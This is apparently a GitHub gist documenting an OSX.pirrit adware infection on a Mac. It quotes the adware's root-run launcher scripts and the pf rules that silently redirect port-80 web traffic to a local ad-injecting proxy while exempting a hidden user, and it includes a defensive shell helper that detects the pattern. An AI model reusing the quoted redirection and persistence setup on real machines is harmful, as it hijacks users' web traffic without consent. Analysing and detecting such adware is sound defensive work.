@dmerejkowsky
Last active July 6, 2016 21:32
Update: found it: it's the OSX.pirrit virus, see here:
http://www.cybereason.com/cybereason-labs-analysis-the-minds-behind-the-osx-pirrit/
Saw a bunch of those running (as root) in htop:
$ ls /etc/*.sh
/etc/Dicyemida.sh*
/etc/Fulah.sh*
/etc/Gothism.sh*
/etc/audile.sh*
/etc/axogamy.sh*
/etc/bacteriohemolysin.sh*
/etc/branchiosaurian.sh*
/etc/duello.sh*
/etc/entry.sh*
/etc/gallflowerUpd.sh*
/etc/hemodystrophy.sh*
/etc/lichenlike.sh*
/etc/overreach.sh*
/etc/retinene.sh*
/etc/run_upd.sh*
/etc/sidereally.sh*
/etc/tealess.sh*
/etc/thiocyanide.sh*
/etc/unwittingly.sh*
All the scripts look the same:
if [ -a /Library/branchiosaurian/Contents/MacOS/branchiosaurian ];
then
sleep 10
sudo pfctl -evf /etc/branchiosaurian.conf
sudo -u Benjy /Library/branchiosaurian/Contents/MacOS/branchiosaurian
fi
exit 0
Each of them has a folder in /Library/<name>.
/Library/<name>/Contents/MacOS/<name> is a Mach-O C++ executable that depends on the Qt4 frameworks (core, gui and network),
plus a script in Contents/MacOS/rec_script.sh which contains:
# set redirections
HIDDEN_USER=$(sudo defaults read /Library/Preferences/com.common.plist user_id)
echo $HIDDEN_USER
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
echo "$pfData" > /etc/pf_proxy.conf
else
echo "Unable to find active interface"
exit 1
fi
exit 0
They also have a .conf in /etc:
$ cat /etc/unwittingly.conf
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state
pass out proto tcp all user indianaite
And `ps aux` shows a pfctl process running like this:
pfctl -evf /etc/<name>.conf
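A small triage helper for the pattern documented above, added here as an example; it is not code from the gist and not the adware's own code. It finds launcher scripts in an /etc-style directory that match the observed shape (a `pfctl -evf <conf>` line followed by `sudo -u <user> /Library/<name>/...`), then pulls out of the referenced pf config the interface and local port that port-80 traffic is redirected to, and the user whose outbound TCP is passed without the route-to rule (the proxy's own identity, so its upstream connections do not loop back into itself). The function names, the fixture directory and the sample files are all constructed for the example; point `find_launchers` at a copy of a real /etc to use it on a suspect machine.

```shell
#!/bin/sh
# Added example: triage helper for the pf-based traffic-hijack persistence
# pattern (launcher script in /etc -> pfctl ruleset -> proxy on localhost).
# All paths are parameters so the checks can run against a copied /etc.

# Print launcher scripts in $1 that match the observed pattern:
# a "pfctl -evf <conf>" line plus a "sudo -u <user> ..." line.
find_launchers() {
    dir=$1
    for f in "$dir"/*.sh; do
        [ -f "$f" ] || continue
        if grep -q 'pfctl -evf' "$f" && grep -q 'sudo -u ' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print the pf config path a launcher loads (the argument of pfctl -evf).
launcher_conf() {
    sed -n 's/.*pfctl -evf[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" | head -n 1
}

# Print "interface port" for each rdr rule that sends outbound port-80 TCP
# to a local port, i.e. the transparent-proxy hook.
redirect_targets() {
    sed -n 's/^rdr pass inet proto tcp from \([^ ]*\) to any port 80 -> 127\.0\.0\.1 port \([0-9]*\).*/\1 \2/p' "$1"
}

# Print users given a plain "pass out proto tcp all user X" rule; with
# last-match-wins semantics that user's traffic skips the route-to loop,
# which is how the proxy reaches the real servers. This is the hidden user.
exempt_users() {
    sed -n 's/^pass out proto tcp all user \([^ ]*\).*/\1/p' "$1"
}

# Build a constructed fixture (not real files) shaped like the ones in the
# notes above, so the helper can be run offline. Prints the directory.
make_fixture() {
    tmp=$(mktemp -d)
    cat > "$tmp/unwittingly.conf" <<'EOF'
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state
pass out proto tcp all user indianaite
EOF
    cat > "$tmp/unwittingly.sh" <<EOF
if [ -a /Library/unwittingly/Contents/MacOS/unwittingly ];
then
sleep 10
sudo pfctl -evf $tmp/unwittingly.conf
sudo -u Benjy /Library/unwittingly/Contents/MacOS/unwittingly
fi
exit 0
EOF
    cat > "$tmp/benign.sh" <<'EOF'
echo "just a normal script"
exit 0
EOF
    printf '%s\n' "$tmp"
}

# Stand-alone run over the constructed fixture.
FIX=$(make_fixture)
for s in $(find_launchers "$FIX"); do
    conf=$(launcher_conf "$s")
    echo "launcher: $s"
    echo "  pf config: $conf"
    redirect_targets "$conf" | while read -r iface port; do
        echo "  port-80 traffic on $iface redirected to 127.0.0.1:$port"
    done
    exempt_users "$conf" | while read -r u; do
        echo "  pf bypass for user: $u"
    done
done
rm -rf "$FIX"
```

On a live machine the same two facts can be cross-checked directly: `sudo pfctl -sn` lists the loaded rdr rules and `sudo lsof -nP -iTCP:9882 -sTCP:LISTEN` shows which process (and which user) owns the local proxy port, which should match the user name the exempt rule names.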
I managed to run one of the executables, here's the output:
./unwittingly
void AdsProxyEngine::init()Ads enabled
bool WebProxy::startProxyServer(unsigned int, QString) "/Library/Preferences/com.unwittingly.plist"
bool WebProxy::startProxyServer(unsigned int, QString) failed starting web proxy server
Started = false
bool AdsProxyEngine::startServer() Could not start proxy server